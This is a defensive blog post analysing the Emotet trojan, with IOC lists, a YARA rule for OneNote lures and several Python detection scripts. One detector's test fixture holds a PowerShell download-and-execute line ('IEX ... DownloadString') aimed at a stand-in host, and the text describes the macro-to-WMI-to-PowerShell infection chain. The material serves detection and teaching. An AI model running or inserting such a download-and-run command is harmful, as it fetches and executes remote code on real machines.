Emotet: One of the Most Dangerous Trojans Ever Created

Emotet is known as one of the most dangerous and costly malware families in existence. It has been used in a wide range of cyber-attacks: stealing banking credentials, distributing other malware, and opening the door to ransomware. Emotet has evolved significantly over time, which makes it hard to detect and defend against. Its modular design lets it be tailored to specific attacks, and it can spread rapidly through a network. The FBI, CISA and other authorities have warned about Emotet's destructive capabilities and urged organizations to take proactive measures to protect themselves.

Ensar Seker
Mar 26, 2023

Emotet is a notorious Trojan that has been active since 2014. It started life as a banking Trojan and is known for its ability to spread rapidly through a network and steal sensitive information, particularly banking credentials; from about 2017 its operators increasingly rented it out as a loader that delivers other criminal groups' malware.

Emotet is typically spread through phishing emails that contain malicious attachments or links. Once a user opens the attachment and enables its macros, or follows the link, the loader is downloaded and installed on the system. Emotet is polymorphic: the loader is repacked so frequently that its file hash changes between campaigns, which defeats signature-based antivirus.

Once installed, Emotet sets up persistence on the infected system, allowing it to continue to run even after a reboot. It also communicates with command-and-control (C2) servers to receive instructions and download additional payloads, such as other malware or ransomware.

Emotet has multiple modules that enable it to perform various malicious activities. These include:

  • Stealing sensitive information: credential-harvesting modules recover saved passwords from browsers and email clients, scrape Outlook mailboxes and contact lists, and capture banking and other sensitive data. This is how the operators obtain the credentials and email threads reused in later campaigns.
  • Spreading to other systems: a spreader module gives Emotet worm-like reach by brute-forcing accounts and SMB shares with built-in password lists and harvested credentials (and, in some campaigns, by exploiting vulnerabilities), while a spam module mails copies of the lure to stolen contacts.
  • Downloading and executing additional malware: Emotet fetches and runs follow-on payloads, historically TrickBot, Qakbot and IcedID, which in turn lead to ransomware.

Emotet's role as the first stage of longer intrusion chains is what made it so damaging. It provided the initial foothold in the Emotet, TrickBot, Ryuk chain behind several high-profile incidents, including the September 2020 Ryuk ransomware attack on Universal Health Services (UHS), which disrupted hospital operations across the US.

Background

  • History: Emotet was first discovered in 2014 as a banking Trojan. Initially it stole victims' banking credentials by intercepting network traffic. Over time, Emotet evolved into a sophisticated, modular malware platform rented out to other criminal groups and capable of a wide range of malicious activities.
  • Variants: Emotet has undergone numerous updates over the years. In 2017 it gained the ability to install other malware, notably TrickBot and Qakbot. By 2018 its spam module was sending millions of spam messages per day, and in late 2018 it added a module that exfiltrates email content and contact lists from Outlook, which fed the reply-chain lures seen in later campaigns.
  • Propagation mechanisms: Emotet is typically distributed through phishing emails that contain malicious attachments, usually an Office document whose macros download the payload from a remote server, or a script that does the same. On the victim's network it spreads by brute-forcing weak passwords or exploiting vulnerabilities, and it uses stolen email contacts to mail the lure to new victims, which is what gives it its worm-like reach. Once installed, Emotet persists through Windows Registry Run keys or a Windows service, scheduled tasks, and a copy of itself stored under a randomly named folder and filename in the user's application data directory.
  • Impact: Emotet is one of the most dangerous malware threats in circulation, with an estimated $2 billion in damages worldwide. It has infected government agencies, financial institutions, healthcare organizations and private businesses. Emotet steals sensitive data, plants additional malware, and enrols infected computers in a botnet used for spam distribution and as the entry point for ransomware attacks.

Technical Details

Emotet is complex malware that combines several techniques to evade detection and carry out its tasks. Its technical features, grouped so that each point appears once:

  • Infection vector: phishing emails carrying malicious attachments or links. Attachments are Microsoft Office documents with VBA (Word) or Excel 4.0 macros, PDFs, ZIP archives or, in the 2023 campaigns, OneNote files with an embedded script; links lead to a compromised website that serves the loader directly. Nothing executes until the user enables content or double-clicks the lure, so the decoy text exists to make that step look required.
  • Distribution and propagation: once the macro runs, it launches a downloader, usually PowerShell spawned directly or via WMI, that fetches the Emotet loader. Inside the network, the spreader module brute-forces accounts and SMB shares with a built-in password list and credentials harvested on the host, exploitation of known vulnerabilities has also been reported, and the spam module mails the lure to contacts stolen from the victim's mailbox, often by replying inside existing threads. Together these give Emotet its worm-like reach.
  • Persistence: a Run key under HKCU or HKLM, or a Windows service, pointing to a copy of the loader stored under a randomly named folder and filename in %AppData% or %LocalAppData%; scheduled tasks have been used as well. Additional payloads are fetched from the C2 on demand rather than bundled with the sample.
  • Polymorphic code and anti-analysis: the loader is repacked for every campaign, frequently several times a day, so file hashes and static signatures age within hours. Strings and API imports are obfuscated and resolved at run time, and the sample checks for virtual machines and sandboxes and changes its behaviour when it detects them.
  • Code injection: the loader injects its code into legitimate processes such as svchost.exe and explorer.exe, so its network activity and memory are attributed to a trusted binary and terminating an odd-looking process does not stop it.
  • Modular architecture and payloads: modules are downloaded from the C2 and run in memory: a spam module, Outlook email and contact harvesters, credential stealers for browsers and mail clients, a network spreader, and a loader for third-party malware. The third-party payloads cause most of the damage: TrickBot, Qakbot, IcedID and, through them, ransomware such as Ryuk.
  • Information theft: the credential-stealing modules (NirSoft-based browser and mail password recovery tools plus Outlook scraping, rather than a classic keylogger) capture logins, banking credentials and email content. The loader also reports an inventory of the host, including hostname, IP address, running processes and installed software, on first check-in.
  • Command and control (C2): a multi-tier infrastructure in which compromised hosts act as first-tier proxies in front of the backend servers that manage the botnet. The bot talks to hard-coded IP:port pairs over HTTP POST (occasionally HTTPS) with an encrypted request body (RSA-wrapped AES keys in older versions, elliptic-curve keys since the November 2021 return) that carries tasking, module downloads and exfiltrated data, so the traffic yields little to content inspection.
  • Analysis: the combination of frequent repacking, obfuscation and encrypted C2 traffic makes Emotet hard to analyse. Analysts combine static analysis (unpacking, string and import recovery) with dynamic analysis (sandbox runs, C2 emulation) to understand a given build.

You can find the full Emotet analysis report at https://tinyurl.com/3dzen5r9

Indicators of Compromise

The indicators below are listed as published. Treat them as leads rather than a ready-made block list: some of the hostnames (for example the plex[.]direct and remotewd[.]com entries) look like legitimate consumer-service infrastructure an analysis host merely contacted, and Emotet C2 addresses rotate within days, so confirm each entry against current threat intelligence before acting on it.

IP Addresses

  • 154.127.113.242
  • 130.0.132.242
  • 85.187.140.169
  • 70.164.196.211
  • 185.14.187.201
  • 62.75.187.192
  • 63.142.253.122
  • 190.145.67.134
  • 85.54.169.141
  • 94.205.247.10
  • 172.67.141.139
  • 174.56.47.59
  • 85.25.207.108
  • 66.29.139.157
  • 60.130.173.117
  • 93.51.50.171
  • 86.122.149.86
  • 37.157.196.117
  • 93.88.93.99
  • 36.92.181.131

Hashes (SHA-1)

  • CCD380EA868FFAD4F960D7455FECF88C2AC35500
  • 06C6442D5BB110140AC1CDBCF1BE52388441B9A0
  • 7BDD1409B080EB8510163CEA3761D694BE0EAEC7
  • 045C4AB485BD45781234451AF0EAE62F23ABCEAE
  • 37F73D6A2285E19C31A33A4087B8D86B73C394F0
  • 3A9494F66BABC7DEB43F65F9F28C44BD9BD4B323
  • B996F03F0A68FD77B1DD23A2069700C03C83E38F
  • 4A9E32BC5348265C43945ADAAF140B98B64329BD
  • B1CAD1540ECB290088252635F8E130022EED7486
  • 98E832E8D670DAED18A0449113B7AE909CFCE32C
  • 3B63193B80192CB258D434E8E9AD61F221C25C66
  • 82FA35D4F8552C453B7AE2603738478CC22A266E
  • F0AC854808EF5855438FC02B394222D79ACF637B
  • DC2E487082BEF771981E65F3AEE8D51970FAE7B4
  • 447A57B8CA984EE2D39CFE7E879A2A79BD6382D0
  • 5A89C0B4D52A8FEB9B4BF7EBD49EB7A84B54B9CD
  • 0F220E69913648FBAE7E41ECAE6F74874FA18CF6
  • 2B7E5A9768A2D282A015450AB9DDDAD2F15CCBB7
  • E0D69A6E9B4ABFB79954DD73EAC0AEC0D4F3B3FC
  • B2DCC727EA358A3A8942E8F97C128EFF55E5C4C0

Domains

  • www.sevmash[.]ru
  • www.dnautik[.]com
  • www.celiksoko[.]rs
  • isns[.]net
  • 9anime[.]id
  • hublosk[.]com
  • www.sifma[.]org
  • www.usbfund[.]com
  • theartofhair[.]com
  • eltem.iptime[.]org
  • elx01.knas[.]systems
  • searchkn1.sima-land[.]ru
  • device-local-3193b8ff-0889-41c5-8fd6-67066f88b277.remotewd[.]com
  • booking.msg.bluhotels[.]com
  • 192-168-100-87.abcdefghijklmnopqrstuvwxyz012345.plex[.]direct
  • frederikkempe[.]com
  • majul[.]com
  • bvdkhuyentanyen[.]vn
  • attatory[.]com
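Published IOC lists like the one above are only useful once they are actually matched against telemetry, and matching has two traps: indicators are defanged ("hublosk[.]com") and must be normalised first, and naive substring matching on hostnames both misses subdomains of a listed zone and false-positives on look-alikes ("nothublosk.com" contains "hublosk.com"). The following is an added example, not part of the original post, that runs a few of the indicators above over constructed proxy log lines; the key=value log layout and the addresses in the non-matching lines are assumptions made for the illustration.

```python
import ipaddress
import re

# Indicators copied from the lists above, in the defanged form they are published in.
IOC_IPS = ["154.127.113.242", "130.0.132.242", "85.187.140.169"]
IOC_DOMAINS = ["hublosk[.]com", "attatory[.]com", "booking.msg.bluhotels[.]com"]

# Constructed proxy log lines (key=value layout assumed for the illustration, not a real log).
SAMPLE_LOG = """\
2023-03-20T09:58:11Z src=10.0.0.5 dst=203.0.113.20:443 host=www.example.com method=GET
2023-03-20T10:01:02Z src=10.0.0.5 dst=154.127.113.242:8080 host=- method=POST
2023-03-20T10:01:09Z src=10.0.0.7 dst=203.0.113.9:443 host=cdn.hublosk.com method=GET
2023-03-20T10:02:40Z src=10.0.0.9 dst=203.0.113.10:80 host=nothublosk.com method=GET
this line is malformed and must be skipped rather than crash the scan
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>[^:\s]+):(?P<port>\d+) host=(?P<host>\S+)")


def refang(indicator):
    """Undo the usual defanging so published IOCs compare equal to log values."""
    return indicator.strip().lower().replace("[.]", ".").replace("hxxp", "http")


def build_matcher(ips, domains):
    """Normalise IOCs: refang, keep only syntactically valid IPs, strip trailing dots."""
    ip_set = set()
    for ip in ips:
        try:
            ip_set.add(str(ipaddress.ip_address(refang(ip))))
        except ValueError:
            pass                                  # skip a malformed indicator rather than abort
    dom_set = {refang(d).rstrip(".") for d in domains}
    return ip_set, dom_set


def domain_hit(hostname, dom_set):
    """Return the listed zone that hostname equals or sits under, else None.
    Comparing whole labels avoids the substring trap where nothublosk.com
    would otherwise match hublosk.com."""
    labels = hostname.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        zone = ".".join(labels[i:])
        if zone in dom_set:
            return zone
    return None


def scan_log(text, ips=IOC_IPS, domains=IOC_DOMAINS):
    """Return (line_no, kind, indicator, source_host) for every IOC match in the log text."""
    ip_set, dom_set = build_matcher(ips, domains)
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue                              # malformed line: skip, do not abort
        if m["dst"] in ip_set:
            hits.append((line_no, "ip", m["dst"], m["src"]))
        zone = domain_hit(m["host"], dom_set) if m["host"] != "-" else None
        if zone:
            hits.append((line_no, "domain", zone, m["src"]))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d: %s IOC %s contacted by %s" % hit)
```

Running it reports two hits: the POST to 154.127.113.242 on line 2 and the cdn.hublosk.com request on line 3; the look-alike on line 4 and the malformed line produce nothing. Swapping SAMPLE_LOG for a real export only requires adjusting LINE_RE to the proxy's format.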

YARA Rules

The rule below (SECUINFRA Falcon Team, via YARAhub) targets the OneNote lure: the first four bytes 0xE4525C7B are the start of the OneNote file header GUID, the $s_* strings are the lure text, the $js* strings are the embedded script, and #GUID == 4 requires exactly four embedded file objects, the three decoy PNGs plus the .js payload.

rule MALWARE_Emotet_OneNote_Delivery_js_Mar23
{
    meta:
        author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
        description = "Detects Microsoft OneNote files used to deliver Emotet (.js Payload)"
        reference = "https://twitter.com/bomccss/status/1636746149855121411"
        date = "2023-03-17"
        tlp = "CLEAR"
        hash = "a43e0864905fe7afd6d8dbf26bd27d898a2effd386e81cfbc08cae9cf94ed968"
        yarahub_reference_md5 = "b951629aedffbabc180ee80f9725f024"
        yarahub_uuid = "eea31d8d-30cb-4210-a054-aa77ad18fd00"
        yarahub_license = "CC BY 4.0"
        yarahub_rule_matching_tlp = "TLP:WHITE"
        yarahub_rule_sharing_tlp = "TLP:WHITE"
        yarahub_author_twitter = "@SI_FalconTeam"

    strings:
        // Lure specific strings
        $s_headline = "Connect to the cloud" wide
        $s_attachment = "This document contains attachments from the cloud" wide
        $s_receive = "to receive them, double click \"Next\"" wide
        $s_imgFileName = "NOTE4_WHITE_1.bmp" wide
        $s_path = "C:\\Autoruns\\" wide
        $s_output = "output1.js"

        // Javascript keywords
        $js1 = "function" ascii
        $js2 = ".replace(\"" ascii

        // Lure contains 3 PNGs and the Javascript code
        $GUID = {E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC}

    condition:
        uint32be(0x0) == 0xE4525C7B
        and 3 of ($s_*)
        and any of ($js*)
        and #GUID == 4
}

Detecting Emotet

To detect Emotet, combine file, network and process-level signatures with behavioral indicators:

  • File signature: Emotet lures are usually legacy OLE (Compound File Binary) Office documents, OOXML documents with a VBA project, or OneNote files. Checking the container type alone (the D0 CF 11 E0 A1 B1 1A E1 magic, reported by libmagic as "Composite Document File V2") only narrows the candidate set, because every legitimate legacy .doc and .xls is OLE too; the useful check is whether the container carries a VBA project or Excel 4.0 macro sheet, and whether that macro launches PowerShell or WMI.
  • Network signature: the bot talks to its C2 with HTTP or HTTPS POST requests carrying encrypted bodies, typically to a bare IP address and non-standard port rather than a hostname, from a process that has no business on the internet. Match destinations against current IOC lists and look for periodic beaconing to the same IP:port.
  • Process behavior: Emotet injects into legitimate processes such as svchost.exe and explorer.exe, so watch those for unexpected outbound connections or unsigned code in memory, and watch for the parent-child anomalies the delivery chain produces: an Office application or WmiPrvSE.exe spawning powershell.exe, or regsvr32.exe/rundll32.exe loading a DLL from a user-writable path.

Here is some sample Python code I wrote that demonstrates the detection of an Emotet-like file signature:

import magic
import sys

# Path of the Office document to check: first command-line argument, or the placeholder
document_path = sys.argv[1] if len(sys.argv) > 1 else '/path/to/document.doc'

# python-magic returns libmagic's description, e.g.
# "Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, ..."
file_type = magic.from_file(document_path)

# OLE2 / Compound File Binary is the container used by legacy .doc, .xls and .ppt files
if 'Composite Document File V2' in file_type:
    print('The file is an OLE file format and may contain Emotet malware.')
else:
    print('The file is not an OLE file format and may not contain Emotet malware.')

This Python code uses the python-magic library to identify the file type and checks whether it is an OLE container, the legacy Office format Emotet lures commonly use. Because every legitimate legacy .doc and .xls is also an OLE file, the check flags a format, not a malicious document: it is a triage filter, and robust detection needs a macro-presence check plus the network and process indicators described above.

Github link: https://github.com/ensarseker1/emotetlikesignature.git
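Going one step beyond the python-magic check, the following added example (written for this page; it is not the author's script or the code in the repository linked above) parses the OLE container itself and looks for the storages that hold a VBA project, and applies the same structural test to OOXML zips and OneNote files, the other lure formats discussed on this page. It uses only the standard library, so libmagic is not needed. The storage names "Macros" (Word), "_VBA_PROJECT_CUR" (Excel) and "VBA" are the ones Office actually writes; the sample documents are built in memory by the two build_* helpers and are constructed fixtures, not real samples.

```python
import io
import struct
import zipfile

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # [MS-CFB] compound file signature
ONENOTE_MAGIC = b"\xE4\x52\x5C\x7B"               # leading bytes of the OneNote file header GUID
ENDOFCHAIN, MAXREGSECT, FREESECT, FATSECT = 0xFFFFFFFE, 0xFFFFFFFA, 0xFFFFFFFF, 0xFFFFFFFD


def ole_directory_entries(data):
    """Walk the CFB directory chain and return (name, object_type) for each live entry
    (1 = storage, 2 = stream, 5 = root).  Handles FATs that fit in the 109 header DIFAT
    slots (roughly 7 MB of file); DIFAT sector chaining for bigger files is left out."""
    if data[:8] != OLE_MAGIC or len(data) < 512:
        return []
    sector_size = 1 << struct.unpack_from("<H", data, 0x1E)[0]
    fat_count = struct.unpack_from("<I", data, 0x2C)[0]
    first_dir = struct.unpack_from("<I", data, 0x30)[0]
    fat = []
    for sect in struct.unpack_from("<109I", data, 0x4C)[:fat_count]:
        off = (sect + 1) * sector_size            # sector n starts at (n + 1) * sector_size
        if sect <= MAXREGSECT and off + sector_size <= len(data):
            fat.extend(struct.unpack_from("<%dI" % (sector_size // 4), data, off))
    entries, sect, seen = [], first_dir, set()
    while sect <= MAXREGSECT and sect not in seen:  # 'seen' stops a looping (corrupt) chain
        seen.add(sect)
        off = (sect + 1) * sector_size
        if off + sector_size > len(data):
            break
        for i in range(sector_size // 128):       # directory entries are 128 bytes each
            raw = data[off + i * 128: off + (i + 1) * 128]
            name_len, obj_type = struct.unpack_from("<H", raw, 64)[0], raw[66]
            if obj_type == 0 or not 2 <= name_len <= 64:
                continue                          # unused slot or corrupt name length
            entries.append((raw[:name_len - 2].decode("utf-16-le", "replace"), obj_type))
        sect = fat[sect] if sect < len(fat) else ENDOFCHAIN
    return entries


def classify_attachment(data):
    """Coarse label derived from container structure, ignoring the file extension."""
    if data[:8] == OLE_MAGIC:
        names = {name for name, _ in ole_directory_entries(data)}
        # Word keeps its VBA project under "Macros", Excel under "_VBA_PROJECT_CUR"; both hold a
        # "VBA" storage.  Excel 4.0 (XLM) macro sheets live inside the "Workbook" stream and are
        # not caught by this check.
        if names & {"Macros", "_VBA_PROJECT_CUR", "VBA"}:
            return "ole-with-vba-project"
        return "ole-no-vba-project"
    if data[:4] == ONENOTE_MAGIC:
        return "onenote"
    if data[:2] == b"PK":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                members = zf.namelist()
        except zipfile.BadZipFile:
            return "zip-corrupt"
        if any(m.lower().endswith("vbaproject.bin") for m in members):
            return "ooxml-with-vba-project"
        return "ooxml-no-vba-project" if "[Content_Types].xml" in members else "zip"
    return "other"


# Constructed fixtures (not real documents) so the functions can be exercised offline.
def build_cfb(entries):
    """Minimal compound file: header, one FAT sector, one directory sector (up to 4 entries)."""
    header = bytearray(512)
    header[:8] = OLE_MAGIC
    struct.pack_into("<HHHHH", header, 0x18, 0x3E, 3, 0xFFFE, 9, 6)   # v3, 512-byte sectors
    struct.pack_into("<III", header, 0x2C, 1, 1, 0)                   # 1 FAT sector; directory at sector 1
    struct.pack_into("<IIIII", header, 0x38, 0x1000, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", header, 0x4C, 0, *([FREESECT] * 108))   # DIFAT: the FAT is sector 0
    fat = struct.pack("<128I", FATSECT, ENDOFCHAIN, *([FREESECT] * 126))
    directory = bytearray()
    for name, obj_type in entries:
        raw_name = name.encode("utf-16-le") + b"\x00\x00"
        entry = bytearray(128)
        entry[:len(raw_name)] = raw_name
        struct.pack_into("<HBB", entry, 64, len(raw_name), obj_type, 1)
        struct.pack_into("<III", entry, 68, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF)  # no siblings/child
        directory += entry
    return bytes(header) + fat + bytes(directory) + bytes(512 - len(directory))


def build_ooxml(with_vba):
    """Minimal OOXML-style zip, optionally carrying a vbaProject.bin part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        if with_vba:
            zf.writestr("word/vbaProject.bin", b"\x00")
    return buf.getvalue()


if __name__ == "__main__":
    samples = {
        "macro .doc": build_cfb([("Root Entry", 5), ("WordDocument", 2), ("Macros", 1), ("VBA", 1)]),
        "plain .doc": build_cfb([("Root Entry", 5), ("WordDocument", 2)]),
        "macro .docm": build_ooxml(True),
        "onenote lure": ONENOTE_MAGIC + b"\x00" * 60,
    }
    for label, blob in samples.items():
        print(f"{label:14} -> {classify_attachment(blob)}")
```

In a mail gateway or sandbox pipeline the label, not the extension, should drive the next step: "ole-with-vba-project" and "ooxml-with-vba-project" go to macro extraction (for example olevba), "onenote" to embedded-object extraction, and an "ole-no-vba-project" .xls still needs an XLM check before it is cleared.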

Here is what ChatGPT suggests 🙂

“Detecting Emotet malware requires a multi-faceted approach and typically involves using a combination of tools and techniques. While it is not possible to provide a single python code that can detect Emotet malware in all cases, here is an example of python code that can be used to search for known indicators of compromise associated with Emotet:”

import os
import hashlib

# Function to calculate the MD5 hash of a file, reading it in 4 KiB chunks
def calculate_file_hash(file_path):
    hash_md5 = hashlib.md5()
    with open(file_path, "rb") as f:
        for chunk in iter(lambda: f.read(4096), b""):
            hash_md5.update(chunk)
    return hash_md5.hexdigest()

# Define a list of known Emotet file hashes (MD5, lowercase hex)
emotet_hashes = ["e274c04829cb1c3d3a4ef76608513206", "fa51b704a33db7d977ecddad00538d7b", "c3f4a4b2aa8910e7b2e9c9d0f1c0ab1f"]

# Traverse a directory and check if any files match the known Emotet hashes
def scan_directory_for_emotet(dir_path):
    for root, dirs, files in os.walk(dir_path):
        for file in files:
            file_path = os.path.join(root, file)
            try:
                file_hash = calculate_file_hash(file_path)
            except OSError:
                continue  # unreadable or locked file: skip it rather than abort the whole scan
            if file_hash in emotet_hashes:
                print(f"Emotet malware detected: {file_path}")

# Example usage: scan the "C:\Program Files" directory for Emotet malware
# (a raw string so the backslash is not read as an escape sequence)
scan_directory_for_emotet(r"C:\Program Files")

“This code defines a function that calculates the MD5 hash of a file and compares it to a list of known Emotet file hashes. It then traverses a directory and checks if any files match the known hashes. If a match is found, the file path is printed to the console.

Please note that this code is just an example and is not guaranteed to detect all instances of Emotet malware. It is always important to use multiple detection methods and keep your antivirus and security software up to date to stay protected against the latest threats.”

Mitigation and Prevention

Here are some mitigation strategies to prevent Emotet Malware from infiltrating the network:

  • Employee Training: Train employees on how to recognize and avoid phishing emails that are used to deliver Emotet malware. Educate employees on the dangers of opening attachments or clicking links in emails from unknown sources.
  • Software Updates and Patches: Ensure that all applications, operating systems, and anti-virus software are updated regularly. Patches and updates can correct vulnerabilities that Emotet can exploit to spread on the network.
  • Access Control: Limit access to sensitive information by granting the minimum necessary permissions to applications and users. Emotet can propagate through the network by brute-forcing usernames and passwords or exploiting known vulnerabilities.
  • Compartmentalization: Use network segmentation to create separate networks for different services or functions such as HR or finance. Compartmentalization prevents Emotet from rapidly moving laterally across the network.
  • Endpoint Protection: deploy endpoint or extended detection and response (EDR/XDR) solutions that can detect and respond to Emotet. By monitoring process behavior (Office-to-PowerShell chains, injection into svchost.exe or explorer.exe, unexpected outbound connections) and blocking or isolating the host on detection, they can cut the chain before the follow-on ransomware is deployed; they reduce the risk but do not prevent ransomware outright.
  • Email Filtering: Use advanced email filtering solutions that can detect and block malicious attachments or links associated with Emotet. These solutions can use artificial intelligence to inspect the contents of emails and attachments for malicious activity.
  • Firewall Configuration: Configure firewalls to limit the communication of the network to only permitted IP addresses and ports. This can prevent Emotet from communicating with its command and control servers or spreading to other systems on the network.
  • Application control (AppLocker or WDAC): enforce it through Group Policy. Although Emotet arrives as an Office document, the macro ultimately has to run an executable, an .exe or, since the 2021 comeback, a DLL loaded through regsvr32.exe or rundll32.exe, from a user-writable location such as %AppData% or %Temp%; allow-list rules that deny execution from those paths break the chain. Pair this with the Group Policy setting that blocks macros in Office files downloaded from the internet.

Newest Tactics that the Emotet Malware Operators are Using to Distribute the Malware and Evade Detection

  • OneNote: In early 2023 Emotet started arriving in Microsoft OneNote files, a format widely used for note-taking and information sharing and rarely treated as a malware carrier by email filters. The lure shows a fake "cloud attachment" notice and a "Next" button; under the button sits an embedded script (a .js file in the variant the YARA rule above targets, VBScript in others) that runs when the user double-clicks it and downloads the Emotet loader, instead of the macro-laden Word document used in earlier campaigns. This is the same pattern of evasion the operators have always followed: switch file types as soon as defenders catch up with the previous one.
  • Excel: The version that returned from its mid-2022 hiatus in November 2022 shows changes to its code and command-and-control infrastructure, indicating that the operators kept developing it during the pause. It uses Excel attachments as bait, with a lure telling the user to copy the file into the Office Templates folder so that the macros run without Microsoft's macro-blocking prompt; the binary carries notable updates, and the botnet has been observed dropping the Bumblebee downloader as well as the IcedID loader. Hundreds of thousands of messages go out per day, with attachments in German, Greek, English, Italian, French and Japanese.
  • WMI: Emotet's macros abuse Windows Management Instrumentation (WMI) to launch powershell.exe: the macro calls Win32_Process.Create rather than the VBA Shell function, so powershell.exe appears as a child of WmiPrvSE.exe instead of WINWORD.EXE and slips past simple parent-child detection rules. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and on server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access; RPCS operates over port 135. Operators use WMI to interact with local and remote systems and to perform many tactical functions, such as gathering information for Discovery and executing files remotely as part of Lateral Movement.

*Here is how Emotet uses WMI to execute powershell.exe in technical detail: https://tinyurl.com/yn4e24er

*Obfuscating Powershell script using GCHQ’s CyberChef: https://tinyurl.com/yt7kada3
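The WMI trick above leaves a clear trace in process-creation telemetry: the PowerShell downloader shows up as a child of WmiPrvSE.exe instead of the Office application, and its command line usually carries a hidden-window switch and an -EncodedCommand blob. The following is an added example (my own, not the author's code or anything from the linked write-ups) that applies that rule to Sysmon-style process-creation events (event ID 1 field names) and decodes the base64-encoded UTF-16LE payload so the analyst sees the actual script. The events, the script and the loader.example.invalid URL are constructed for the illustration.

```python
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "onenote.exe"}
WMI_HOST = "wmiprvse.exe"
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common spellings are listed.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64 of the UTF-16LE script text; return the script or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Rule for one process-creation event.  Fires only for powershell.exe whose parent is
    WmiPrvSE.exe or an Office application (encoded or hidden PowerShell alone is too noisy);
    the command-line flags are recorded as supporting evidence."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    if image != "powershell.exe" or parent not in OFFICE_APPS | {WMI_HOST}:
        return None
    reasons = ["powershell spawned by WmiPrvSE.exe (WMI Win32_Process.Create from a macro)"
               if parent == WMI_HOST else f"powershell spawned directly by {parent}"]
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is not None:
        reasons.append("encoded command")
    if HIDDEN_RE.search(event["CommandLine"]):
        reasons.append("hidden window")
    return {"pid": event["ProcessId"], "parent": parent, "reasons": reasons, "decoded": decoded}


def scan(events):
    return [hit for hit in map(evaluate, events) if hit]


# Constructed events.  The download URL uses the reserved .invalid TLD and is not a real IOC.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://loader.example.invalid/a')"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": f"powershell -w hidden -enc {ENCODED}"},
    {"ProcessId": 4188, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -NoProfile -Command Get-Process"},
    {"ProcessId": 4210, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell -ep bypass -w hidden -c \"Start-Sleep 1\""},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["pid"], hit["parent"], "; ".join(hit["reasons"]))
        if hit["decoded"]:
            print("   decoded:", hit["decoded"])
```

The first and third events fire (WMI parent with an encoded, hidden command; Word spawning PowerShell directly), while the administrator's interactive PowerShell under explorer.exe does not. The same parent-child logic translates directly into a SIEM or EDR query on Sysmon event ID 1 or Windows event 4688 with command-line auditing enabled.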

In a nutshell, Emotet is sophisticated malware that uses multiple techniques to evade detection and carry out its tasks: its modular architecture, polymorphic loader, stealthy persistence and network-spreading capabilities make it a significant threat to organizations and individuals. Protecting against it means implementing best practices for email and web security, keeping antivirus and endpoint software up to date, and teaching users how to identify and avoid phishing emails.
